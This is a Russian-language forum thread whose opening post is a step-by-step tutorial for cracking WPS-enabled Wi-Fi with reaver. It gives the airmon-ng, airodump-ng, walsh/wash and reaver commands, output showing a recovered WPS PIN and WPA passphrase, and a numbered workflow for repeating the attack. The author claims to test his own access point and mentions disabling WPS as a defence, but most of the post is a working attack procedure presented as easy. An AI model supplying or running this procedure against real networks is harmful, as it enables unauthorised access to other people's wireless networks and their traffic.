Ответ
 
LinkBack Опции темы
Старый 26.01.2012, 23:35      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Reaver. Взлом Wi-Fi сети

Всем привет!

Наконец то дошли руки до написания статьи по reaver. Но для начала давайте немного теории.

Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.

Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.

Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).

Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.

Код:
sudo airmon-ng
Переводим интерфейс wlan1 в режим монитора (monitor mode).

Код:
sudo airmon-ng start wlan1
После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.

Код:
sudo airodump-ng mon0
Кстати, можно так же использовать программу walsh. Она позволяет просматривать точки доступа (AP), на которых включен WPS.

Код:
sudo walsh -i mon0
Код:
Scanning for supported APS...

 BC:AE:C5:71:D3:17 hub-lex-AP
 84:C9:B2:4C:E0:57 1-OJ
 00:24:01:1B:1F:B3 more
 F0:7D:68:40:46:DE Okean
 00:14:D1:E2:06:94 TRENDnet651
 14:D6:4D:B5:07:4C DomTar
Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.

Код:
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv

Код:
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt) 

...

[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP'
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Последний раз редактировалось levinkv; 03.04.2012 в 18:19.
levinkv вне форума   Ответить с цитированием
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
1234567890 (15.05.2013), dqod (10.02.2012)
Старый 11.02.2012, 02:56      #2 (ссылка на пост)
dqod
Продвинутый юзер
 
Аватар для dqod
 
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
dqod скоро придёт к известности
Информация

Отправить сообщение для dqod с помощью ICQ Отправить сообщение для dqod с помощью Skype™
По умолчанию

А что такое WPS? Вид соединения из ряда WPA2/WPA? Если да, то в чём отличие от последних?
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.
dqod вне форума   Ответить с цитированием
Старый 11.02.2012, 18:21    Топик Стартер ТС   #3 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию

Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.

Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
levinkv вне форума   Ответить с цитированием
Этот пользователь сказал Спасибо levinkv за это полезное сообщение:
MiraMaX166 (12.02.2012)
Старый 13.03.2012, 06:14      #4 (ссылка на пост)
dqod
Продвинутый юзер
 
Аватар для dqod
 
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
dqod скоро придёт к известности
Информация

Отправить сообщение для dqod с помощью ICQ Отправить сообщение для dqod с помощью Skype™
По умолчанию

Если не сложно, распиши пожалуйста что значат символы в строке
Код:
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv
(интересуют -i, -vv) Спасибо.
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.

Последний раз редактировалось dqod; 13.03.2012 в 06:25.
dqod вне форума   Ответить с цитированием
Старый 13.03.2012, 15:09    Топик Стартер ТС   #5 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию

-i - задание интерфейса
-vv - подробное отображение


дополнительно -> http://code.google.com/p/reaver-wps/wiki/README
levinkv вне форума   Ответить с цитированием
Старый 13.03.2012, 23:07      #6 (ссылка на пост)
dqod
Продвинутый юзер
 
Аватар для dqod
 
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
dqod скоро придёт к известности
Информация

Отправить сообщение для dqod с помощью ICQ Отправить сообщение для dqod с помощью Skype™
По умолчанию

Сегодня пробовал тестировать на точке друга по обоюдному согласию. Использовал сборку BackTrack 5 RC2 Возникли как всегда вопросы:
1) пришлось заболванить ось т.к. программа, по той ссылке которую ты кинул в другой своей теме на сайт backtrack c описанием как сделать запускаемую ось с флешки, поддерживает только BT 5 RC1 Так вот вопрос, не знаешь с флешки быстрее будет работать чем с болванки? Если да, то я лучше RC1 скачаю и запишу на флешку.
2) walsh:
а) я в BT 5 RC2 его не нашёл, он входит в RC1 или надо Linux ставить что бы им пользоваться?
b) он показывает только те точки которые работают по протоколу WPS или показывает все, но WPS отдельно обозначает?
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.
dqod вне форума   Ответить с цитированием
Старый 13.03.2012, 23:34    Топик Стартер ТС   #7 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию

1. конечно с флешки быстрее, у нее скорость считывания гораздо выше, чем у болванки
2. walsh был, когда reaver был версии 1.3; теперь reaver 1.4 и walsh переименован в wash

порядок действий такой:
1. качаешь BT5 R2
2. грузишь на флешку
3. запускаешь wash, чтобы просканировать AP в радиусе действия на наличие WPS
4. запускаешь reaver

будут вопросы пиши, отвечу.
levinkv вне форума   Ответить с цитированием
Старый 27.11.2012, 09:12      #8 (ссылка на пост)
Mover
Ламер
 
Аватар для Mover
 
Регистрация: 27.11.2012
Сообщений: 2
Mover на пути к лучшему
Информация

По умолчанию

Цитата:
WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
что это?
Mover вне форума   Ответить с цитированием
Старый 27.11.2012, 20:35      #9 (ссылка на пост)
MiraMaX166
Инквизитор
 
Аватар для MiraMaX166
 
Регистрация: 29.01.2008
Адрес: Омск
Сообщений: 2,304
MiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспоримаMiraMaX166 репутация неоспорима
Информация

Отправить сообщение для MiraMaX166 с помощью ICQ Отправить сообщение для MiraMaX166 с помощью AIM Отправить сообщение для MiraMaX166 с помощью MSN Отправить сообщение для MiraMaX166 с помощью Skype™
По умолчанию

Пароль
__________________
Хакер - это не профессия, а стиль жизни, в которой всё время идёшь вперёд, в которой испытываешь постоянный информационный голод и бросаешь вызов технологиям. Это путь бесконечной вереницы вопросов и ответов...


My PC: Fractal Design Define R6/ i9-9900K@5.00GHz/ ASUS MAXIMUS XI HERO (Wi-Fi)/ 64Gb RAM Dual DDR4 3000/ SSD Samsung EVO 860 250Gb + HDD WD Purple 4Tb/ nVidia GeForce RTX 2080 Ti FE 11Gb/ ASUS VG245Q 24" Full HD/ Sound Microlab Pro One
My Notebook: HP ENVY x360 15 (Ryzen 5 2500U@3,6GHz/ 16Gb RAM Dual DDR4 2400/ SSD M.2 Samsung CM871a 128Gb +HDD Seagate BarraCuda Pro 1Tb/ AMD Radeon Vega 8 1Gb/ FP 15.6" FHD / HP Pen)
My Server: HPE ProLiant MicroServer Gen8 (XEON E3-1265LV2@2.5~3.5GHz 8 threads/ 16Gb ECC RAM 1600/ HP P222 2Gb Cache FBWC 4x4TB Toshiba 4xRAID10/ ESXi 6.5U3/ iLO 4 v2.73)
My Phone: Samsung Galaxy Note 23 Ultra/ Android 13/ 256Gb + DeX Station + Galaxy Watch 46mm + Galaxy Buds Pro
My Tab: Samsung Galaxy Note 10.1 2014/ Android 5.1.1/ 32Gb/ Flash mSD 64Gb


Почему "Винда-отстой" кричат громче всех те, кто и в Линукс ничего не понимают...
Говорим спасибо и жмём на возле аватара или кнопочку
MiraMaX166 вне форума   Ответить с цитированием
Этот пользователь сказал Спасибо MiraMaX166 за это полезное сообщение:
x04y (06.04.2013)
Старый 27.11.2012, 22:52      #10 (ссылка на пост)
Mover
Ламер
 
Аватар для Mover
 
Регистрация: 27.11.2012
Сообщений: 2
Mover на пути к лучшему
Информация

По умолчанию

попробовал поискать точки WPS. запнулся вот на чем:
Цитата:
root@bt:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
Mover вне форума   Ответить с цитированием
Ответ

Социальные закладки

Метки
reaver wifi, walsh, взлом wi fi, взлом wpa, как взломать wi-fi


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks Вкл.
Pingbacks Вкл.
Refbacks Вкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом Wi-Fi WPA2-PSK dqod Лаборатория Хакера 9 19.02.2012 17:21
Социальные сети Mr.Alex Свободное общение 17 03.02.2010 13:21
Проблемы с инет соединением по локальной сети Maximko Спрашивали? Отвечаем! 3 13.12.2009 13:59
Настройка домашней сети с WI-Fi Parker Программное обеспечение 28 14.10.2009 19:39
Взлом замков t1975453 Лаборатория Хакера 0 06.05.2009 12:53


Реламный блок
 

Текущее время: 06:46. Часовой пояс GMT +6.


Rambler's Top100 Счётчик тиц

vBulletin Skin by MiraMaX166
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Время генерации страницы 0.25662 секунды с 28 запросами